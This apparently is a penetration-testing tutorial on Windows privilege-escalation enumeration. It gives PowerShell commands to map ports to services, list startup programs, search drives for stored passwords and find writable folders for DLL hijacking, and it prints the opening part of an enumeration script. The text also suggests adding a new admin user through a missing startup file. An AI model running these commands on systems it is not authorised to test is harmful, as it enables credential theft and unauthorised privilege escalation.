Often, enumerating information with pure windows commands, requires administrator access. For example, it is normally not possible to enumerate which service listens on a specific ports with netstat -b if not admin. To overcome this, you can seperately fetch the listening port information and service information and then match the process ID of both. Then by searching the output for “localport” it is possible to conclude which service is using the port. By knowing the service, it is much easier to tweak requests and connections on the specific port, to match potential vulnerabilities.
The following line will accomplish enumerating the port associated with a service:
Get-WmiObject win32_service -filter "state='running'" | Select Name, ProcessID, PathName, Startname, @{Name="ListenPort";Expression={Get-NetTCPConnection -OwningProcess $_.ProcessID -state listen | select localport }} | format-list
Another good escalation point is information that may be enumerated from the startup folder. For example, some files may run as administrator and write access to such files could therefore provide an escalation option. Likewise, sometimes the file may have been deleted from the server/workstation, but is still in the list of programs to run during startup. In such occasion, you can simply create the file (if write access to the locations) and add a line to create a new admin user.
The following powershell command may be used to enumerate the startup folder:
Get-CimInstance Win32_StartupCommand | select name,command,location,user
Files that contains credentials could also be present on a systems drive. The following powershell command may be used to find files that contains credentials:
cd c:\ gci -r -Exclude *.exe, *.dll, *.sys, *.hlp, *.cab, *.png, *.jpg, *.msi, *.zip, *.7z, *.bmp, *.gif | select-string "password","admin","credentials","-P","net use","domain name here"
Information of which files and folders that are writeable could be very valuable. Executable files that are writeable could provide a good escalation point, if any scripts and other programs executes such files as a privilged user. Likewise, if for example one of the folders in the the path variable are writeable (viewed the the path or set command), you may be able to perform DLL hijacking. The following powershell code may be used to enumerate files and folders with write access for a specific group:
cd c:\
function Get-Paths {
$group = "*Users*"
$root_folder = $args[0]
write-output "[*] Processing writable folders recursively in $root_folder"
foreach($_ in (Get-ChildItem $root_folder -recurse -ErrorAction SilentlyContinue)){
if($_.PSIsContainer){
try { $res = Get-acl $_.FullName }
catch
{
continue
}
foreach ($a in $res.access){
if ($a.IdentityReference -like $group){
if ( ($a.FileSystemRights -like "*Write*" -or $a.FileSystemRights -like "*CreateFiles*" ) -and
$a.FileSystemRights -like "*ReadAndExecute*" ){
write-output "[+] " $_.FullName
}}}}}}
These and many other options are part of the “dirty script” below called POW Enum. This script is attached below. Before running the script you need to match and replace “h:\” with a drive/folder you can write to, preferably home folder. You also should match replace “(domain name here)” with the AD domain that you are hacking.
pow_enum.ps1 – script
#POW Enum - by Kenny Jansson, 2017 #The following powershell scripts enumerates information which may be used for privelege escalation. In addition, powerup should be run (may have to invoke each function separately if exeuction is limited). #Before running the script you need to match and replace “h:\” with a drive/folder you can write to, preferably home folder. You also should match replace "(domain name here)" with the AD domain that you are hacking. #Get all connections get-nettcpconnections > h:\connections.txt #Get Listening ports Get-NetTCPConnection -State Listen > h:\listening_ports.txt # Get version number of produces (match any version against common vulnerabilities) Get-WmiObject -Class Win32_Product | select Name, Vendor, Version, InstallLocation > h:\products.txt # Get services (check for the version number of any service that are running as localsystem and if there are any known vulnerabilities, also check for unquoted paths or ~1 ~2 paths – if write access to the path you may pwn the service) Get-WmiObject win32_service | select * > h:\services.txt # Powershell - get listening port for each process Get-NetTCPConnection -state listen | select @{Name="ProcessName";Expression={Get-Process -id $_.OwningProcess}}, LocalPort > h:\process_ports.txt # Powershell - get listening port for each service (attempt to browse or netcat to the port of each service – search the file for “localport”) Get-WmiObject win32_service -filter "state='running'" | Select Name, ProcessID, PathName, Startname, @{Name="ListenPort";Expression={Get-NetTCPConnection -OwningProcess $_.ProcessID -state listen | select localport }} | format-list> h:\ports_services.txt # Get os version gwmi win32_operatingsystem | % caption > h:\os_version.txt # Get Hotfixes (check for vulnerabilities with windows-exploit-suggester.py) get-hotfix > h:\hotfixes.txt # Get Scheduled tasks get-scheduledtask > h:\sched_tasks.txt # Get statup programs (maybe its possible to replace the program to be started for all users, or if the program listed does not exist.. create it!) Get-CimInstance Win32_StartupCommand | select name,command,location,user > h:\startup.txt # Get unquoted service paths